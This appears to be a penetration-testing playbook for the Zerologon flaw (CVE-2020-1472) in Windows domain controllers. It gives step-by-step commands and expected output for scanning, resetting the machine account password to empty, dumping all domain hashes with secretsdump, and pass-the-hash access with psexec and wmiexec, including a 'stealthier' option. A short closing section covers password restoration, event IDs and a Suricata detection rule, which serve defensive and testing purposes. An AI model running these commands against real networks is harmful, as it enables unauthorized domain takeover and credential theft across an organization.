Exploit the Zerologon vulnerability (CVE-2020-1472) in the Netlogon Remote Protocol to achieve domain controller compromise by resetting the machine account password to empty.
Zerologon (CVE-2020-1472) is a critical elevation of privilege vulnerability (CVSS 10.0) in the Microsoft Netlogon Remote Protocol (MS-NRPC). The flaw exists in the cryptographic implementation of AES-CFB8 mode, where the initialization vector (IV) is incorrectly set to all zeros. This allows an unauthenticated attacker with network access to a domain controller to establish a Netlogon session and reset the DC machine account password to empty, achieving full domain compromise. Microsoft patched this vulnerability in August 2020 (KB4571694).
Legal Notice: This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.
| Technique ID | Name | Tactic |
|---|---|---|
| T1068 | Exploitation for Privilege Escalation | Privilege Escalation |
| T1210 | Exploitation of Remote Services | Lateral Movement |
| T1003.006 | OS Credential Dumping: DCSync | Credential Access |
| T1078.002 | Valid Accounts: Domain Accounts | Persistence |
The Netlogon authentication protocol uses AES-CFB8 encryption with a client challenge and server challenge. The vulnerability exists because:
# Scan for domain controllers
nmap -p 135,139,389,445 -sV --script=ms-sql-info,smb-os-discovery 10.10.10.0/24
# Check if DC is vulnerable using zerologon checker
python3 zerologon_tester.py DC01 10.10.10.1
# Using CrackMapExec
crackmapexec smb 10.10.10.1 -M zerologon
# Using Impacket's CVE-2020-1472 exploit
# This sets the DC machine account password to empty
python3 cve_2020_1472.py DC01$ 10.10.10.1
# Expected output:
# Performing authentication attempts...
# =========================================
# NetrServerAuthenticate2 Result: 0 (success after ~256 attempts)
# NetrServerPasswordSet2 call was successful
# DC01$ machine account password set to empty string
# Use the empty hash to perform DCSync
secretsdump.py -no-pass -just-dc corp.local/DC01\[email protected]
# Output includes all domain hashes:
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
# krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f3bc61e97fb14d18c42bcbf6c3a9055f:::
# svc_sql:1103:aad3b435b51404eeaad3b435b51404ee:e4cba78b4c01d6e5c0e31ffff18e46ab:::
# Alternatively, dump specific accounts
secretsdump.py -no-pass corp.local/DC01\[email protected] \
-just-dc-user Administrator
# Pass the Hash with Administrator NTLM
psexec.py -hashes :32ed87bdb5fdc5e9cba88547376818d4 \
corp.local/[email protected]
# Or use wmiexec for stealthier access
wmiexec.py -hashes :32ed87bdb5fdc5e9cba88547376818d4 \
corp.local/[email protected]
WARNING: After exploiting Zerologon, the DC machine account password is empty, which will break Active Directory replication and services. You MUST restore it.
# Method 1: Use the exploit's restore functionality
python3 restorepassword.py corp.local/DC01@DC01 -target-ip 10.10.10.1 \
-hexpass <original_hex_password>
# Method 2: Force machine account password change from DC
# Connect to DC as Administrator and run:
netdom resetpwd /server:DC01 /userd:CORP\Administrator /passwordd:*
# Method 3: Restart the DC (it will auto-regenerate machine password)
# This is the safest method but causes downtime
Event ID 4742: A computer account was changed
- Look for: DC$ account with password change
- Anomaly: Multiple 4742 events for DC$ in short period
Event ID 5805: Netlogon authentication failure
- Multiple failures followed by success = Zerologon attempt
Event ID 4624 (Type 3): Network logon
- DC$ account logging in from unexpected IP
# Suricata rule for Zerologon
alert dcerpc any any -> any any (
msg:"ET EXPLOIT Possible Zerologon NetrServerReqChallenge";
flow:established,to_server;
dce_opnum:4;
content:"|00 00 00 00 00 00 00 00|";
sid:2030870;
rev:1;
)